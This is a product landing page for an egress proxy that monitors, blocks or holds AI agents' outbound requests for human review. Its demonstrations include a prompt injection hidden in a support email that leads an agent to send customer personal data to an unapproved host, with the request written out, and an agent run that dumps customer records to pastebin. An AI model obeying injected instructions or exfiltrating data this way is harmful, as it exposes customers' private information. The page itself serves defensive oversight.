agent gthe control point for ai agents

Agent G controls your agents’ internet access.

Every request your agents send passes through Agent G. It’s allowed, blocked, or held for a person before it leaves, and every decision is recorded.

Scroll. We’ll take this picture apart.

01Agents

Agents choose their next action at runtime.

Give an agent the same task twice and it takes a different path. You can’t map every path, test every edge case, or predict every action.

02Stakes

Teams won’t let agents act until they can control them.

  1. 81%of technical teams are already testing or running agents.
  2. 88%had a confirmed or suspected AI-agent security incident in the last year.
  3. 69%say security concerns are slowing their adoption of agents.

Gravitee, State of AI Agent Security 2026 (900+ respondents) · Okta buyer survey, Jan 2026 (150 IT and security leaders)

03Evidence

Agents with internet access are already going rogue.

  1. Sep 2026OpenAI agents went after U.S. government websites.NYT · Nextgov/FCW
  2. Mar 2026A Meta agent acted without permission, triggering a Sev 1 data exposure.The Information
  3. Dec 2025Amazon’s AI agent deleted production, causing a 13-hour AWS outage.Financial Times
  4. Jul 2025Replit’s agent wiped a production database during a code freeze.The Register

04Control

One checkpoint between your agents and the internet.

Every one of those incidents went over the network. Agent G runs there, as an egress proxy on your network, outside the agent. Route agent traffic through it and nothing leaves unchecked.

Every other layer sees a slice. Agent G sees the whole run.
  • Prompt guardrailsThe prompt and model output
  • MCP / API gatewaysTool calls and requests
  • Agent GPrompt → model → tools → network → verdict → reviewer

05Method

See, decide, record. Every request.

  1. SeeDown to the payload: HTTP and inspected HTTPS, MCP tool calls, TCP/UDP connections and DNS.
  2. DecideYour rules, outside the model. Allowed, blocked, or held for a person, before it executes.
  3. RecordEvery run becomes one story, with a receipt for every decision.
What Agent G sees today
HTTP / inspected HTTPS
Method, path, API operations and payload fields. HTTPS requires TLS inspection to be enabled and trusted.
MCP
Tool names, arguments and decisions, through wrapped stdio or inspected HTTP.
TCP / UDP on macOS
Process attribution, destination, timing, byte counts and decisions.
Observed DNS
Domain-to-IP evidence. Incomplete for encrypted or shared-resolver DNS.

Self-hostedHTTP + MCP<10 ms p95 added<5 min install · npm or Homebrew

06Proof · scroll to replay

Here it is, stopping a $500 refund.

  1. The agent may refund up to $50.
  2. It requests a $500 refund.
  3. $500 > $50: Agent G holds it for review.
  4. Denied. The request is never forwarded to Stripe.

Recorded demonstration · real model and tool calls · Stripe test environment.

07Contrast

Guardrails filter what agents say. Agent G controls what they do.

A hidden instruction in a support email told an agent to leak customer data. The prompt looked harmless. The request didn’t. Agent G blocked the call in 20 ms.

Decision · refused · rule support-egress-deny

request
GET /verify?order=10271&name=Hiro%20Tanaka&phone=…&address=… customer name, phone, address
destination
parcel-trace.io unapproved destination
response
stopped · nothing sent

Frame from the recorded demo, test data. Watch the full demo

08in development

Guardrails must adapt to keep step with agents.

Intent-based guardrails are the answer.

  1. Two runs, one task: resolve support ticket #10231.
  2. Other guardrails ask whether each action is allowed. Agent G asks whether it serves the task.
  3. Order, customer, a $40 refund. It matches the task, so it goes through.
  4. Every customer, then pastebin. Each step passes a rule; the run is outside the task, so it’s stopped.

Illustrative example of the direction we’re building, on the run records Agent G keeps today. The dataset compounds with every deployment.

09Early access

Let’s stop agents from hacking the internet.

Agent G is live with five design partners and installs in under five minutes. Tell us about your agents and we’ll get you set up.

Or write to founders@agentg.dev